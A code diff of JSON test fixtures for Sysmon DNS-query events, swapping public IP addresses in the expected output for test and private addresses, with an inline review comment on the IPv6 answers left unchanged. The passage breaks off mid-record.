@@ -1182,7 +1182,7 @@ "event": { "code": "22", "kind": "event", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029251400Z'/\u003e\u003cEventRecordID\u003e88\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.727\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epx.ads.linkedin.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 mix.linkedin.com;type: 5 any-na.mix.linkedin.com;::ffff:108.174.10.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029251400Z'/\u003e\u003cEventRecordID\u003e88\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.727\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epx.ads.linkedin.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 mix.linkedin.com;type: 5 any-na.mix.linkedin.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon" }, "winlog": { 
@@ -1202,7 +1202,7 @@ "event_data": { "QueryName": "px.ads.linkedin.com", "QueryStatus": "0", - "QueryResults": "type: 5 mix.linkedin.com;type: 5 any-na.mix.linkedin.com;::ffff:108.174.10.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 mix.linkedin.com;type: 5 any-na.mix.linkedin.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.727", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -1228,7 +1228,7 @@ "winlog": { "time_created": "2019-07-18T03:34:03.029Z", "event_data": { - "QueryResults": "type: 5 login.msa.msidentity.com;type: 5 lgin.msa.trafficmanager.net;::ffff:40.90.23.239;::ffff:40.90.23.213;::ffff:40.90.23.154;", + "QueryResults": "type: 5 login.msa.msidentity.com;type: 5 lgin.msa.trafficmanager.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.733", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -1259,7 +1259,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029260200Z'/\u003e\u003cEventRecordID\u003e89\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.733\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elogin.live.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 login.msa.msidentity.com;type: 5 lgin.msa.trafficmanager.net;::ffff:40.90.23.239;::ffff:40.90.23.213;::ffff:40.90.23.154;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029260200Z'/\u003e\u003cEventRecordID\u003e89\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.733\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elogin.live.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 login.msa.msidentity.com;type: 5 lgin.msa.trafficmanager.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" } }, { 
@@ -1268,7 +1268,7 @@ "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029315200Z'/\u003e\u003cEventRecordID\u003e90\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.792\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edis.criteo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:74.119.119.150;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029315200Z'/\u003e\u003cEventRecordID\u003e90\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.792\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edis.criteo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "version": 5, 
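Review bot: Only the IPv4 answers were replaced; the IPv6 answers `2001:503:a83e::2:30`, `2001:503:231d::2:30`, `2001:503:83eb::30`, `2001:500:856e::30` and `2001:502:1ca1::30` keep their original public values, which is inconsistent with the commit's stated aim of moving every public test IP into the supported subset. If the motivation is a test GeoIP database that only knows a fixed set of addresses, these presumably remain outside it and any enrichment on them stays untested or environment-dependent. Separately, mapping the IPv4 glue records onto `192.168.x.30` turns formerly public addresses into RFC 1918 ones, so the expected output for these answers now reflects the private-address path of any IP classification or geo step; worth confirming that is intended rather than using a public address from the subset.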
@@ -1287,7 +1287,7 @@ "ProcessId": "2736", "QueryName": "dis.criteo.com", "QueryStatus": "0", - "QueryResults": "::ffff:74.119.119.150;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;", + "QueryResults": "::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.792" }, 
@@ -1311,7 +1311,7 @@ { "@timestamp": "2021-05-05T15:30:51.696Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029331100Z'/\u003e\u003cEventRecordID\u003e91\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.792\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eib.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:68.67.180.12;::ffff:68.67.179.228;::ffff:68.67.180.44;::ffff:204.13.192.141;::ffff:68.67.178.230;::ffff:68.67.178.252;::ffff:68.67.179.23;::ffff:68.67.179.232;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029331100Z'/\u003e\u003cEventRecordID\u003e91\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.792\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eib.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" 
@@ -1330,7 +1330,7 @@ "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", "level": "information", "event_data": { - "QueryResults": "type: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:68.67.180.12;::ffff:68.67.179.228;::ffff:68.67.180.44;::ffff:204.13.192.141;::ffff:68.67.178.230;::ffff:68.67.178.252;::ffff:68.67.179.23;::ffff:68.67.179.232;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;", + "QueryResults": "type: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.792", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -1352,7 +1352,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029339900Z'/\u003e\u003cEventRecordID\u003e92\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.809\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:172.217.10.34;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029339900Z'/\u003e\u003cEventRecordID\u003e92\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.809\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "winlog": { @@ -1370,7 +1370,7 @@ }, "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 pagead.l.doubleclick.net;::ffff:172.217.10.34;", + "QueryResults": "type: 5 pagead.l.doubleclick.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.809", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -1389,7 +1389,7 @@ { "@timestamp": "2021-05-05T15:30:51.696Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029350100Z'/\u003e\u003cEventRecordID\u003e93\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.821\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.adsrvr.org\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 match-975362022.us-east-1.elb.amazonaws.com;::ffff:54.208.129.24;::ffff:54.175.5.93;::ffff:52.86.210.96;::ffff:3.93.252.59;::ffff:54.86.97.130;::ffff:34.194.239.194;::ffff:3.94.67.102;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029350100Z'/\u003e\u003cEventRecordID\u003e93\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.821\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.adsrvr.org\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 match-975362022.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -1401,7 +1401,7 @@ }, "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 match-975362022.us-east-1.elb.amazonaws.com;::ffff:54.208.129.24;::ffff:54.175.5.93;::ffff:52.86.210.96;::ffff:3.93.252.59;::ffff:54.86.97.130;::ffff:34.194.239.194;::ffff:3.94.67.102;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;", + "QueryResults": "type: 5 match-975362022.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.821", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -1428,7 +1428,7 @@ { "@timestamp": "2021-05-05T15:30:51.696Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029358900Z'/\u003e\u003cEventRecordID\u003e94\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' 